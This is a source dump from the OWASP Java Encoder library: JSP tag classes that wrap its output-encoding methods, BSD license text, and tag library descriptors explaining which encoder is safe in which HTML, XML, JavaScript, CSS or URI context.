* * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForJavaScriptSourceTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forJavaScriptSource(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptTag.java000066400000000000000000000041321375203724500305700ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. 
package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform JavaScript encoding. * This wraps the {@link org.owasp.encoder.Encode#forJavaScript(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForJavaScriptTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forJavaScript(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForUriComponentTag.java000066400000000000000000000042741375203724500311530ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag that performs percent-encoding for a component of a URI, such as a query * parameter name or value, path, or query-string. * This wraps the {@link org.owasp.encoder.Encode#forUriComponent(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForUriComponentTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forUriComponent(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForUriTag.java000066400000000000000000000041411375203724500272610ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. 
// // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; import java.io.IOException; import javax.servlet.jsp.JspException; import org.owasp.encoder.Encode; /** * A tag to perform percent-encoding of a URL according to RFC 3986. * This wraps the {@link org.owasp.encoder.Encode#forUri(java.lang.String)}. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForUriTag extends EncodingTag { @Override public void doTag() throws JspException, IOException { Encode.forUri(getJspContext().getOut(), _value); } } owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForXmlAttributeTag.java000066400000000000000000000041431375203724500311500ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. 
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions
// are met:
//
//     * Redistributions of source code must retain the above
//       copyright notice, this list of conditions and the following
//       disclaimer.
//
//     * Redistributions in binary form must reproduce the above
//       copyright notice, this list of conditions and the following
//       disclaimer in the documentation and/or other materials
//       provided with the distribution.
//
//     * Neither the name of the OWASP nor the names of its
//       contributors may be used to endorse or promote products
//       derived from this software without specific prior written
//       permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
// OF THE POSSIBILITY OF SUCH DAMAGE.

package org.owasp.encoder.tag;

import java.io.IOException;
import javax.servlet.jsp.JspException;
import org.owasp.encoder.Encode;

/**
 * A tag to perform XML Attribute Encoding.
 * This wraps the {@link org.owasp.encoder.Encode#forXmlAttribute(java.lang.String)}.
 *
 * @author Jeremy Long (jeremy.long@gmail.com)
 */
public class ForXmlAttributeTag extends EncodingTag {
    @Override
    public void doTag() throws JspException, IOException {
        // Stream the encoded form of the value attribute straight to the page output.
        Encode.forXmlAttribute(getJspContext().getOut(), _value);
    }
}
owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForXmlCommentTag.java
// Copyright (c) 2012 Jeff Ichnowski
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions
// are met:
//
//     * Redistributions of source code must retain the above
//       copyright notice, this list of conditions and the following
//       disclaimer.
//
//     * Redistributions in binary form must reproduce the above
//       copyright notice, this list of conditions and the following
//       disclaimer in the documentation and/or other materials
//       provided with the distribution.
//
//     * Neither the name of the OWASP nor the names of its
//       contributors may be used to endorse or promote products
//       derived from this software without specific prior written
//       permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
// OF THE POSSIBILITY OF SUCH DAMAGE.

package org.owasp.encoder.tag;

import java.io.IOException;
import javax.servlet.jsp.JspException;
import org.owasp.encoder.Encode;

/**
 * A tag to perform XML Comment Encoding.
 * This wraps the {@link org.owasp.encoder.Encode#forXmlComment(java.lang.String)}.
 * Not for use in (X)HTML comments, where browsers may interpret comment
 * contents (see the forXmlComment description in the TLD).
 *
 * @author Jeremy Long (jeremy.long@gmail.com)
 */
public class ForXmlCommentTag extends EncodingTag {
    @Override
    public void doTag() throws JspException, IOException {
        // Stream the encoded form of the value attribute straight to the page output.
        Encode.forXmlComment(getJspContext().getOut(), _value);
    }
}
owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForXmlContentTag.java
// Copyright (c) 2012 Jeff Ichnowski
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions
// are met:
//
//     * Redistributions of source code must retain the above
//       copyright notice, this list of conditions and the following
//       disclaimer.
//
//     * Redistributions in binary form must reproduce the above
//       copyright notice, this list of conditions and the following
//       disclaimer in the documentation and/or other materials
//       provided with the distribution.
//
//     * Neither the name of the OWASP nor the names of its
//       contributors may be used to endorse or promote products
//       derived from this software without specific prior written
//       permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
// OF THE POSSIBILITY OF SUCH DAMAGE.

package org.owasp.encoder.tag;

import java.io.IOException;
import javax.servlet.jsp.JspException;
import org.owasp.encoder.Encode;

/**
 * A tag to perform XML Content Encoding.
 * This wraps the {@link org.owasp.encoder.Encode#forXmlContent(java.lang.String)}.
 * Quotation characters are left alone, so this tag is not safe inside an
 * XML attribute value; use ForXmlAttributeTag or ForXmlTag there.
 *
 * @author Jeremy Long (jeremy.long@gmail.com)
 */
public class ForXmlContentTag extends EncodingTag {
    @Override
    public void doTag() throws JspException, IOException {
        // Stream the encoded form of the value attribute straight to the page output.
        Encode.forXmlContent(getJspContext().getOut(), _value);
    }
}
owasp-java-encoder-1.2.3/jsp/src/main/java/org/owasp/encoder/tag/ForXmlTag.java
// Copyright (c) 2012 Jeff Ichnowski
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions
// are met:
//
//     * Redistributions of source code must retain the above
//       copyright notice, this list of conditions and the following
//       disclaimer.
//
//     * Redistributions in binary form must reproduce the above
//       copyright notice, this list of conditions and the following
//       disclaimer in the documentation and/or other materials
//       provided with the distribution.
//
//     * Neither the name of the OWASP nor the names of its
//       contributors may be used to endorse or promote products
//       derived from this software without specific prior written
//       permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
// OF THE POSSIBILITY OF SUCH DAMAGE.

package org.owasp.encoder.tag;

import java.io.IOException;
import javax.servlet.jsp.JspException;
import org.owasp.encoder.Encode;

/**
 * A tag to perform XML Encoding.
 * This wraps the {@link org.owasp.encoder.Encode#forXml(java.lang.String)}.
 *
 * @author Jeremy Long (jeremy.long@gmail.com)
 */
public class ForXmlTag extends EncodingTag {
    @Override
    public void doTag() throws JspException, IOException {
        // Stream the encoded form of the value attribute straight to the page output.
        Encode.forXml(getJspContext().getOut(), _value);
    }
}
owasp-java-encoder-1.2.3/jsp/src/main/resources/
owasp-java-encoder-1.2.3/jsp/src/main/resources/META-INF/
owasp-java-encoder-1.2.3/jsp/src/main/resources/META-INF/LICENSE
Copyright (c) 2015 Jeff Ichnowski
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:

    * Redistributions of source code must retain the above
      copyright notice, this list of conditions and the following
      disclaimer.
    * Redistributions in binary form must reproduce the above
      copyright notice, this list of conditions and the following
      disclaimer in the documentation and/or other materials
      provided with the distribution.

    * Neither the name of the OWASP nor the names of its
      contributors may be used to endorse or promote products
      derived from this software without specific prior written
      permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
OF THE POSSIBILITY OF SUCH DAMAGE.
owasp-java-encoder-1.2.3/jsp/src/main/resources/META-INF/java-encoder-advanced.tld
OWASP Java Encoder Project 1.0 java-encoder https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#advanced

Encodes data for an XML CDATA section. On the chance that the input contains a terminating "]]>", it will be replaced by "]]>]]<![CDATA[>". As with all XML contexts, characters that are invalid according to the XML specification will be replaced by a space character. Caller must provide the CDATA section boundaries.
forCDATA forCDATA org.owasp.encoder.tag.ForCDATATag empty
The value to be written out value true true java.lang.String

This method encodes for HTML text content. It does not escape quotation characters and is thus unsafe for use with HTML attributes. Use either forHtml or forHtmlAttribute for those contexts.
forHtmlContent forHtmlContent org.owasp.encoder.tag.ForHtmlContentTag empty
value to be written out value true true java.lang.String

Encodes for XML and XHTML attribute content.
forXmlAttribute forXmlAttribute org.owasp.encoder.tag.ForXmlAttributeTag empty
value to be written out value true true java.lang.String

Encodes for XML and XHTML.
forXml forXml org.owasp.encoder.tag.ForXmlTag empty
value to be written out value true true java.lang.String

Encodes for a JavaScript string. It is safe for use in HTML script attributes (such as onclick), script blocks, JSON files, and JavaScript source. The caller MUST provide the surrounding quotation characters for the string. Since this performs additional encoding so it can work in all of the JavaScript contexts listed, it may be slightly less efficient than using one of the methods targeted to a specific JavaScript context: forJavaScriptAttribute, forJavaScriptBlock, or forJavaScriptSource. Unless you are interested in saving a few bytes of output or are writing a framework on top of this library, it is recommended that you use this method over the others.
forJavaScript forJavaScript org.owasp.encoder.tag.ForJavaScriptTag empty
value to be written out value true true java.lang.String

This method encodes for JavaScript strings contained within HTML script attributes (such as onclick). It is NOT safe for use in script blocks. The caller MUST provide the surrounding quotation characters. This method performs the same encode as Encode.forJavaScript(String) with the exception that / is not escaped.
forJavaScriptAttribute forJavaScriptAttribute org.owasp.encoder.tag.ForJavaScriptAttributeTag empty
value to be written out value true true java.lang.String

This method encodes for JavaScript strings contained within HTML script blocks. It is NOT safe for use in script attributes (such as onclick). The caller must provide the surrounding quotation characters. This method performs the same encode as Encode.forJavaScript(String) with the exception that " and ' are encoded as \" and \' respectively.
forJavaScriptBlock forJavaScriptBlock org.owasp.encoder.tag.ForJavaScriptBlockTag empty
value to be written out value true true java.lang.String

This method encodes for JavaScript strings contained within a JavaScript or JSON file. This method is NOT safe for use in ANY context embedded in HTML. The caller must provide the surrounding quotation characters. This method performs the same encode as Encode.forJavaScript(String) with the exception that / and & are not escaped and " and ' are encoded as \" and \' respectively.
forJavaScriptSource forJavaScriptSource org.owasp.encoder.tag.ForJavaScriptSourceTag empty
value to be written out value true true java.lang.String

Encodes for unquoted HTML attribute values. forHtml(String) or forHtmlAttribute(String) should usually be preferred over this method as quoted attributes are XHTML compliant.
forHtmlUnquotedAttribute forHtmlUnquotedAttribute org.owasp.encoder.tag.ForHtmlUnquotedAttributeTag empty
value to be written out value true true java.lang.String

Performs percent-encoding of a URL according to RFC 3986. The provided URL is assumed to be a valid URL. This method does not do any checking on the quality or safety of the URL itself. In many applications it may be better to use java.net.URI instead. Note: this is a particularly dangerous context to put untrusted content in, as for example a "javascript:" URL provided by a malicious user would be "properly" escaped, and still execute.
forUri forUri org.owasp.encoder.tag.ForUriTag empty
value to be written out value true true java.lang.String

Encodes for CSS URL contexts. The context must be surrounded by "url()". It is safe for use in both style blocks and attributes in HTML. Note: this does not do any checking on the quality or safety of the URL itself. The caller should ensure that the URL is safe for embedding (e.g. input validation) by other means.
forCssUrl forCssUrl org.owasp.encoder.tag.ForCssUrlTag empty
value to be written out value true true java.lang.String

Encoder for XML comments. NOT FOR USE WITH (X)HTML CONTEXTS. (X)HTML comments may be interpreted by browsers as something other than a comment, typically in vendor specific extensions (e.g. <!--[if IE]>). For (X)HTML it is recommended that unsafe content never be included in a comment.
forXmlComment forXmlComment org.owasp.encoder.tag.ForXmlCommentTag empty
value to be written out value true true java.lang.String

Encodes for HTML text attributes.
forHtmlAttribute forHtmlAttribute org.owasp.encoder.tag.ForHtmlAttributeTag empty
value to be written out value true true java.lang.String

Encodes for (X)HTML text content and text attributes.
forHtml forHtml org.owasp.encoder.tag.ForHtmlTag empty
value to be written out value true true java.lang.String

Encodes for XML text content. It does not escape quotation characters and is thus unsafe for use with XML attributes. Use either forXml or forXmlAttribute for those contexts.
forXmlContent forXmlContent org.owasp.encoder.tag.ForXmlContentTag empty
value to be written out value true true java.lang.String

Performs percent-encoding for a component of a URI, such as a query parameter name or value, path or query-string. In particular this method ensures that special characters in the component do not get interpreted as part of another component.
forUriComponent forUriComponent org.owasp.encoder.tag.ForUriComponentTag empty
value to be written out value true true java.lang.String

Encodes for CSS strings. The context must be surrounded by quotation characters. It is safe for use in both style blocks and attributes in HTML.
forCssString forCssString org.owasp.encoder.tag.ForCssStringTag empty
value to be written out value true true java.lang.String

Encodes for (X)HTML text content and text attributes.
forHtml forHtml org.owasp.encoder.Encode java.lang.String forHtml(java.lang.String) forHtml(unsafeData)

This method encodes for HTML text content. It does not escape quotation characters and is thus unsafe for use with HTML attributes. Use either forHtml or forHtmlAttribute for those contexts.
forHtmlContent forHtmlContent org.owasp.encoder.Encode java.lang.String forHtmlContent(java.lang.String) forHtmlContent(unsafeData)

Encodes for HTML text attributes.
forHtmlAttribute org.owasp.encoder.Encode java.lang.String forHtmlAttribute(java.lang.String) forHtmlAttribute(unsafeData)

Encodes for unquoted HTML attribute values. forHtml(String) or forHtmlAttribute(String) should usually be preferred over this method as quoted attributes are XHTML compliant.
forHtmlUnquotedAttribute forHtmlUnquotedAttribute org.owasp.encoder.Encode java.lang.String forHtmlUnquotedAttribute(java.lang.String) forHtmlUnquotedAttribute(unsafeData)

Encodes for CSS strings. The context must be surrounded by quotation characters. It is safe for use in both style blocks and attributes in HTML.
forCssString forCssString org.owasp.encoder.Encode java.lang.String forCssString(java.lang.String) forCssString(unsafeData)

Encodes for CSS URL contexts. The context must be surrounded by "url()". It is safe for use in both style blocks and attributes in HTML. Note: this does not do any checking on the quality or safety of the URL itself. The caller should ensure that the URL is safe for embedding (e.g. input validation) by other means.
forCssUrl forCssUrl org.owasp.encoder.Encode java.lang.String forCssUrl(java.lang.String) forCssUrl(unsafeData)

Performs percent-encoding of a URL according to RFC 3986. The provided URL is assumed to be a valid URL. This method does not do any checking on the quality or safety of the URL itself. In many applications it may be better to use java.net.URI instead. Note: this is a particularly dangerous context to put untrusted content in, as for example a "javascript:" URL provided by a malicious user would be "properly" escaped, and still execute.
forUri forUri org.owasp.encoder.Encode java.lang.String forUri(java.lang.String) forUri(unsafeData)

Performs percent-encoding for a component of a URI, such as a query parameter name or value, path or query-string. In particular this method ensures that special characters in the component do not get interpreted as part of another component.
forUriComponent forUriComponent org.owasp.encoder.Encode java.lang.String forUriComponent(java.lang.String) forUriComponent(unsafeData)

Encodes for XML and XHTML.
forXml forXml org.owasp.encoder.Encode java.lang.String forXml(java.lang.String) forXml(unsafeData)

Encodes for XML text content. It does not escape quotation characters and is thus unsafe for use with XML attributes. Use either forXml or forXmlAttribute for those contexts.
forXmlContent forXmlContent org.owasp.encoder.Encode java.lang.String forXmlContent(java.lang.String) forXmlContent(unsafeData)

Encodes for XML and XHTML attribute content.
forXmlAttribute forXmlAttribute org.owasp.encoder.Encode java.lang.String forXmlAttribute(java.lang.String) forXmlAttribute(unsafeData)

Encoder for XML comments. NOT FOR USE WITH (X)HTML CONTEXTS. (X)HTML comments may be interpreted by browsers as something other than a comment, typically in vendor specific extensions (e.g. <!--[if IE]>). For (X)HTML it is recommended that unsafe content never be included in a comment.
forXmlComment org.owasp.encoder.Encode java.lang.String forXmlComment(java.lang.String) forXmlComment(unsafeData)

Encodes data for an XML CDATA section. On the chance that the input contains a terminating "]]>", it will be replaced by "]]>]]<![CDATA[>". As with all XML contexts, characters that are invalid according to the XML specification will be replaced by a space character. Caller must provide the CDATA section boundaries.
forCDATA forCDATA org.owasp.encoder.Encode java.lang.String forCDATA(java.lang.String) forCDATA(unsafeData)

Encodes for a JavaScript string. It is safe for use in HTML script attributes (such as onclick), script blocks, JSON files, and JavaScript source. The caller MUST provide the surrounding quotation characters for the string. Since this performs additional encoding so it can work in all of the JavaScript contexts listed, it may be slightly less efficient than using one of the methods targeted to a specific JavaScript context: forJavaScriptAttribute, forJavaScriptBlock, or forJavaScriptSource. Unless you are interested in saving a few bytes of output or are writing a framework on top of this library, it is recommended that you use this method over the others.
forJavaScript forJavaScript org.owasp.encoder.Encode java.lang.String forJavaScript(java.lang.String) forJavaScript(unsafeData)

This method encodes for JavaScript strings contained within HTML script attributes (such as onclick). It is NOT safe for use in script blocks. The caller MUST provide the surrounding quotation characters. This method performs the same encode as Encode.forJavaScript(String) with the exception that / is not escaped.
forJavaScriptAttribute forJavaScriptAttribute org.owasp.encoder.Encode java.lang.String forJavaScriptAttribute(java.lang.String) forJavaScriptAttribute(unsafeData)

This method encodes for JavaScript strings contained within HTML script blocks. It is NOT safe for use in script attributes (such as onclick). The caller must provide the surrounding quotation characters. This method performs the same encode as Encode.forJavaScript(String) with the exception that " and ' are encoded as \" and \' respectively.
forJavaScriptBlock forJavaScriptBlock org.owasp.encoder.Encode java.lang.String forJavaScriptBlock(java.lang.String) forJavaScriptBlock(unsafeData)

This method encodes for JavaScript strings contained within a JavaScript or JSON file. This method is NOT safe for use in ANY context embedded in HTML. The caller must provide the surrounding quotation characters. This method performs the same encode as Encode.forJavaScript(String) with the exception that / and & are not escaped and " and ' are encoded as \" and \' respectively.
forJavaScriptSource forJavaScriptSource org.owasp.encoder.Encode java.lang.String forJavaScriptSource(java.lang.String)
<%@page contentType="text/javascript; charset=UTF-8"%> var data = '${forJavaScriptSource(unsafeData)}';
owasp-java-encoder-1.2.3/jsp/src/main/resources/META-INF/java-encoder.tld
OWASP Java Encoder Project 1.0 java-encoder https://www.owasp.org/index.php/OWASP_Java_Encoder_Project

Encodes data for an XML CDATA section. On the chance that the input contains a terminating "]]>", it will be replaced by "]]>]]<![CDATA[>". As with all XML contexts, characters that are invalid according to the XML specification will be replaced by a space character. Caller must provide the CDATA section boundaries.
forCDATA forCDATA org.owasp.encoder.tag.ForCDATATag empty
The value to be written out value true true java.lang.String

This method encodes for HTML text content. It does not escape quotation characters and is thus unsafe for use with HTML attributes. Use either forHtml or forHtmlAttribute for those contexts.
forHtmlContent forHtmlContent org.owasp.encoder.tag.ForHtmlContentTag empty
value to be written out value true true java.lang.String

Encodes for XML and XHTML attribute content.
forXmlAttribute forXmlAttribute org.owasp.encoder.tag.ForXmlAttributeTag empty
value to be written out value true true java.lang.String

Encodes for XML and XHTML.
forXml forXml org.owasp.encoder.tag.ForXmlTag empty
value to be written out value true true java.lang.String

Encodes for a JavaScript string. It is safe for use in HTML script attributes (such as onclick), script blocks, JSON files, and JavaScript source. The caller MUST provide the surrounding quotation characters for the string. Since this performs additional encoding so it can work in all of the JavaScript contexts listed, it may be slightly less efficient than using one of the methods targeted to a specific JavaScript context: forJavaScriptAttribute, forJavaScriptBlock, or forJavaScriptSource. Unless you are interested in saving a few bytes of output or are writing a framework on top of this library, it is recommended that you use this method over the others.
forJavaScript forJavaScript org.owasp.encoder.tag.ForJavaScriptTag empty
value to be written out value true true java.lang.String

Encodes for unquoted HTML attribute values. forHtml(String) or forHtmlAttribute(String) should usually be preferred over this method as quoted attributes are XHTML compliant.
forHtmlUnquotedAttribute forHtmlUnquotedAttribute org.owasp.encoder.tag.ForHtmlUnquotedAttributeTag empty
value to be written out value true true java.lang.String

Performs percent-encoding of a URL according to RFC 3986. The provided URL is assumed to be a valid URL. This method does not do any checking on the quality or safety of the URL itself. In many applications it may be better to use java.net.URI instead. Note: this is a particularly dangerous context to put untrusted content in, as for example a "javascript:" URL provided by a malicious user would be "properly" escaped, and still execute.
forUri forUri org.owasp.encoder.tag.ForUriTag empty
value to be written out value true true java.lang.String

Encodes for CSS URL contexts. The context must be surrounded by "url()". It is safe for use in both style blocks and attributes in HTML. Note: this does not do any checking on the quality or safety of the URL itself. The caller should ensure that the URL is safe for embedding (e.g. input validation) by other means.
forCssUrl forCssUrl org.owasp.encoder.tag.ForCssUrlTag empty
value to be written out value true true java.lang.String

Encodes for HTML text attributes.
forHtmlAttribute forHtmlAttribute org.owasp.encoder.tag.ForHtmlAttributeTag empty
value to be written out value true true java.lang.String

Encodes for (X)HTML text content and text attributes.
forHtml forHtml org.owasp.encoder.tag.ForHtmlTag empty
value to be written out value true true java.lang.String

Encodes for XML text content. It does not escape quotation characters and is thus unsafe for use with XML attributes. Use either forXml or forXmlAttribute for those contexts.
forXmlContent forXmlContent org.owasp.encoder.tag.ForXmlContentTag empty
